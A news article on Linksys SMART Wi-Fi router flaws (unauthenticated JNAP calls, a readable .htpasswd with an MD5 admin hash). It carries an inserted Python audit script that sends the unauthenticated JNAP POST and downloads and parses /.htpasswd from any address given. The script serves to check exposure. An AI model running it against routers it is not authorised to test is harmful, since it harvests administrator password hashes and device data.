Two models of Linksys' popular consumer and small-office routers remain exposed to a pair of vulnerabilities recently patched in other models of the Belkin-owned networking gear.
Linksys EA2700 and EA3500 routers running Linksys SMART Wi-Fi firmware have yet to be patched against vulnerabilities that expose the administrator's credentials and can give an outsider access to the router.
Researcher Kyle Lovett reported the vulnerabilities in July; Linksys patched the bugs on Oct. 23 in E4200v2, EA4500, EA6200, EA6300, EA6400, EA6500, EA6700, and EA6900 models. Public exploits for the vulnerabilities in the EA3500 and EA6500 models were available on a Turkish hacker site in mid-September.
Both vulnerabilities are exploitable without authentication, and remotely wherever the router's administrative ports are reachable from the WAN side; Linksys encourages SOHO and consumer users to turn on automatic updates on the models that support it.
“Linksys has an option to have automatic updates, which makes the patches hit far more units than other SOHO models out there,” Lovett said.
The vulnerabilities were detailed late last week in an advisory released by US-CERT. The more serious of the two, Lovett said, is an information disclosure vulnerability: a remote attacker sends malicious JNAP calls in a specially crafted HTTP POST request to http://<router IP>/JNAP/.
“Depending on the JNAP action that is called, the attacker may be able to read or modify sensitive information on the router,” the advisory said.
The router exposes a number of ports to the wide area network by default; ports 10080 and 52000 expose the router's administrative interface to anyone who can reach the WAN side.
“If the end user changes the default password, the JNAP issue I think is more serious due to the vast numbers of different pieces of information disclosure that the different JNAP POST calls allow for,” Lovett said. “Once an attacker knows which X-JNAP-Action to call, it’s only a matter of crafting the correct POST body.”
The other bug is a key management error that lets an attacker on the local network read the router's .htpasswd file. The attacker need only request http://<router IP>/.htpasswd; the file contains the MD5 hash of the administrator password, which is enough to recover the password by offline cracking.
“The htpasswd can be as easy, remote or local, as typing in http://IP/.htpasswd,” Lovett said. “Cracking the password depends, obviously, on a couple of different factors.”
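The two request shapes described above, the unauthenticated JNAP POST and the direct GET of /.htpasswd, as an added audit helper written for this article. It is not code from the article, from Lovett, US-CERT or Linksys; the specific JNAP action name, the "result"/"output" JSON response shape it parses, and the sample .htpasswd content are assumptions made for the example, and the network probe should only be pointed at hardware you own or are authorised to test.

```python
#!/usr/bin/env python3
"""Audit helpers for the two SMART Wi-Fi issues: an unauthenticated JNAP
POST to /JNAP/ and a direct GET of /.htpasswd. Added example, not vendor code."""
import http.client
import json
import re
import sys

JNAP_PATH = "/JNAP/"
HTPASSWD_PATH = "/.htpasswd"
# Ports the article says the firmware exposes to the WAN by default.
WAN_ADMIN_PORTS = (10080, 52000)
# Assumed, illustrative action name: the article names no specific actions,
# only that each call is selected with the X-JNAP-Action header.
ASSUMED_ACTION = "http://linksys.com/jnap/core/GetDeviceInfo"
# Constructed sample of an exposed .htpasswd (hash is MD5 of "password").
SAMPLE_HTPASSWD = "admin:5f4dcc3b5aa765d61d8327deb882cf99\n"


def build_jnap_request(host, action, params=None, port=80):
    """Raw HTTP/1.1 bytes of a JNAP call: a POST to /JNAP/ whose action is
    chosen by X-JNAP-Action and whose JSON body carries the parameters.
    No Authorization header is sent, which is the whole point of the test."""
    body = json.dumps(params or {}).encode()
    head = "\r\n".join([
        f"POST {JNAP_PATH} HTTP/1.1",
        f"Host: {host}:{port}",
        f"X-JNAP-Action: {action}",
        "Content-Type: application/json; charset=UTF-8",
        f"Content-Length: {len(body)}",
        "", "",
    ]).encode()
    return head + body


def parse_jnap_response(raw):
    """Assumed response shape: JSON object with "result" ("OK" on success)
    and "output". Returns (result, output); ("invalid", {}) for non-JSON."""
    try:
        obj = json.loads(raw)
    except (ValueError, TypeError):
        return "invalid", {}
    if not isinstance(obj, dict):
        return "invalid", {}
    return str(obj.get("result", "invalid")), obj.get("output") or {}


HASH_SCHEMES = (
    (re.compile(r"^[0-9a-f]{32}$", re.I), "md5-hex"),
    (re.compile(r"^\$apr1\$"), "apr1-md5"),
    (re.compile(r"^\$1\$"), "crypt-md5"),
    (re.compile(r"^\{SHA\}"), "sha1-base64"),
)


def parse_htpasswd(text):
    """Parse user:hash lines into {user: (hash, scheme)}; the scheme tells an
    operator how cheap the hash is to crack (every MD5 form is cheap)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, hashed = line.split(":", 1)
        scheme = next((n for rx, n in HASH_SCHEMES if rx.search(hashed)), "unknown")
        entries[user] = (hashed, scheme)
    return entries


def _http(host, port, method, path, headers=None, body=None, timeout=5.0):
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


def audit(host, ports=WAN_ADMIN_PORTS):
    """Probe each port for both issues and return (port, kind, detail) tuples."""
    findings = []
    for port in ports:
        try:
            status, text = _http(host, port, "GET", HTPASSWD_PATH)
            if status == 200 and parse_htpasswd(text):
                findings.append((port, "htpasswd-readable", parse_htpasswd(text)))
            status, text = _http(host, port, "POST", JNAP_PATH,
                                 {"X-JNAP-Action": ASSUMED_ACTION,
                                  "Content-Type": "application/json"}, b"{}")
            result, output = parse_jnap_response(text)
            if status == 200 and result == "OK":
                findings.append((port, "jnap-unauthenticated", output))
        except (OSError, http.client.HTTPException) as exc:
            findings.append((port, "error", str(exc)))
    return findings


if __name__ == "__main__":
    if len(sys.argv) < 2:  # no target: show the offline parsers on the sample
        print(parse_htpasswd(SAMPLE_HTPASSWD))
        print(build_jnap_request("192.0.2.1", ASSUMED_ACTION).decode())
    else:
        for port, kind, detail in audit(sys.argv[1]):
            print(f"{sys.argv[1]}:{port} {kind}: {detail}")
```

Run with no argument to see the request bytes and parsed sample offline; pass a router address to probe ports 10080 and 52000 from the WAN side, which is exactly the exposure the article describes. An "htpasswd-readable" finding or a JNAP "OK" result without credentials means the device needs the patched firmware.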
Home and small office routers have been a favorite target for black hats and researchers alike. Researchers at Rapid7 recently uncovered a security issue in NAT-PMP protocol implementations that put more than 1.2 million routers at risk of attack. Hackers could exploit the vulnerabilities to redirect traffic, access network services, or learn device configuration details.
“If you look at the last 15 years, the vulnerability landscape has migrated from servers then to Web applications, then client side applications, and now network devices,” said Rapid7 chief research officer HD Moore. “If you look at all the work Microsoft put into networking stacks and product security, the same type of effort was not put into embedded device security at all. Not to mention that it’s a huge pain in the butt to update; there are slow update cycles and the ecosystem is very complex.”
The annual DEF CON security conference this summer attempted to shine a harsher light on the issue when it hosted a hacking contest called SOHOpelessly Broken. Researchers were tasked with finding previously unreported security vulnerabilities in popular home routers and did not disappoint, turning in 15, including seven that fully compromised the router in question and one that could lead to corruption of an internal network.